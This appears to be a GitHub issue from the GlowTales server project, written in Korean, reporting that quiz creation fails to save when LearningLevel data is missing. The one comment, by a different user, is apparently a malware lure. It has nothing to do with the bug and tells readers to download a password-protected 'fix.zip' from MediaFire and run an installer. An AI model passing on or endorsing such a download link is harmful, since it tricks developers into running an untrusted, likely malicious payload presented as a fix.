### ISSUE TITLE
[BUG] 퀴즈 생성 시 학습 언어 관련 데이터가 없음에도 불구하고 저장이 안됨

### ISSUE THREAD

**Issue by hayeongKo** [GlowTales/GlowTales-Server#95]
### 🐞 버그 설명
퀴즈 생성 시 LearningLevel을 받아오는데 해당 데이터가 없음에도 불구하고 저장이 안되고 있음

### 💭 예상된 결과
해당 데이터가 db에 없을 경우 저장되어야 함

### 🔜 추가 내용
저장 로직 추가

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
